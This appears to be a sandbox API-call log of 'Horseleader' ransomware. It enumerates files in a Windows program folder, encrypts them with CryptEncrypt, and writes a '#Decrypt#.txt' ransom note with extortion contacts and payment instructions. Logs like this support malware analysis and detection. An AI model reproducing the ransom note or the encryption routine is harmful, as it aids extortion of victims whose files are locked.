ftLastWriteTime.dwLowDateTime=0x544241af, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, 
nFileSizeLow=0xb05, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0251.885] lstrcmpiW (lpString1="15x15dot.png", lpString2="Windows") returned -1 [0251.885] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png") returned 69 [0251.885] StrStrIW (lpFirst="15x15dot.png", lpSrch=".horseleader") returned 0x0 [0251.885] lstrcmpW (lpString1="15x15dot.png", lpString2="#Decrypt#.txt") returned 1 [0251.885] lstrcmpW (lpString1="15x15dot.png", lpString2="_uninstalling_.png") returned 1 [0251.885] lstrlenW (lpString=".testttjffg") returned 11 [0251.885] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png", lpSrch=".testttjffg") returned 0x0 [0251.885] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.885] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.885] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.886] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f740a33, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f740a33, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5444a30d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x15f4, dwReserved0=0x7e1110, 
dwReserved1=0xfbc691b5, cFileName="720x480icongraphic.png", cAlternateFileName="")) returned 1 [0251.886] lstrcmpiW (lpString1="720x480icongraphic.png", lpString2="Windows") returned -1 [0251.886] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png") returned 79 [0251.886] StrStrIW (lpFirst="720x480icongraphic.png", lpSrch=".horseleader") returned 0x0 [0251.886] lstrcmpW (lpString1="720x480icongraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.886] lstrcmpW (lpString1="720x480icongraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.886] lstrlenW (lpString=".testttjffg") returned 11 [0251.886] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.886] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.886] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.886] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\720x480icongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.887] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6ce61c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6ce61c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5444a30d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, 
nFileSizeLow=0x143e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="720_480shadow.png", cAlternateFileName="")) returned 1 [0251.887] lstrcmpiW (lpString1="720_480shadow.png", lpString2="Windows") returned -1 [0251.887] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png") returned 74 [0251.887] StrStrIW (lpFirst="720_480shadow.png", lpSrch=".horseleader") returned 0x0 [0251.887] lstrcmpW (lpString1="720_480shadow.png", lpString2="#Decrypt#.txt") returned 1 [0251.887] lstrcmpW (lpString1="720_480shadow.png", lpString2="_uninstalling_.png") returned 1 [0251.887] lstrlenW (lpString=".testttjffg") returned 11 [0251.887] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png", lpSrch=".testttjffg") returned 0x0 [0251.887] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.887] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.888] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\720_480shadow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.888] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7ff104, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7ff104, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x54613375, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, 
nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.888] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.888] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png") returned 89 [0251.888] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.888] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.888] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.888] lstrlenW (lpString=".testttjffg") returned 11 [0251.888] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.888] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.888] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.888] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.889] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7b2e4a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7b2e4a, 
ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x54e68005, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.889] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.889] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png") returned 95 [0251.889] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.889] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.889] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.889] lstrlenW (lpString=".testttjffg") returned 11 [0251.889] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.889] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.889] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.889] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.889] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: 
lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7d8fa7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7d8fa7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x54f98af5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.889] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.889] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png") returned 90 [0251.889] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.889] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.889] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.889] lstrlenW (lpString=".testttjffg") returned 11 [0251.889] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.890] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.890] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.890] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.890] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f78cced, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f78cced, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5529264d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.890] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.890] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png") returned 96 [0251.890] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.890] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.890] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.890] lstrlenW (lpString=".testttjffg") returned 11 [0251.890] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.890] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.890] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.890] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program 
files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.890] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f766b90, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f766b90, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5529264d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.891] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.891] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png") returned 87 [0251.891] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.891] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.891] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.891] lstrlenW (lpString=".testttjffg") returned 11 [0251.891] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.891] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.891] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.891] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.891] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7b2e4a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7b2e4a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.891] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.891] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png") returned 93 [0251.891] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.891] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.891] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.891] lstrlenW (lpString=".testttjffg") returned 11 [0251.891] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.892] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.892] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.892] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.892] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6a84bf, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6a84bf, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x60d7, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="photograph.png", cAlternateFileName="")) returned 1 [0251.892] lstrcmpiW (lpString1="photograph.png", lpString2="Windows") returned -1 [0251.892] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png") returned 71 [0251.892] StrStrIW (lpFirst="photograph.png", lpSrch=".horseleader") returned 0x0 [0251.892] lstrcmpW (lpString1="photograph.png", lpString2="#Decrypt#.txt") returned 1 [0251.892] lstrcmpW (lpString1="photograph.png", lpString2="_uninstalling_.png") returned 1 [0251.892] lstrlenW (lpString=".testttjffg") returned 11 [0251.892] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png", lpSrch=".testttjffg") returned 0x0 [0251.892] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.892] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.892] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\photograph.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.893] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6a84bf, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6a84bf, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x60d7, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="photograph.png", cAlternateFileName="")) returned 0 [0251.893] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.894] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\#Decrypt#.txt") returned 70 [0251.894] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.895] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client 
will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.895] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.897] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.897] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, 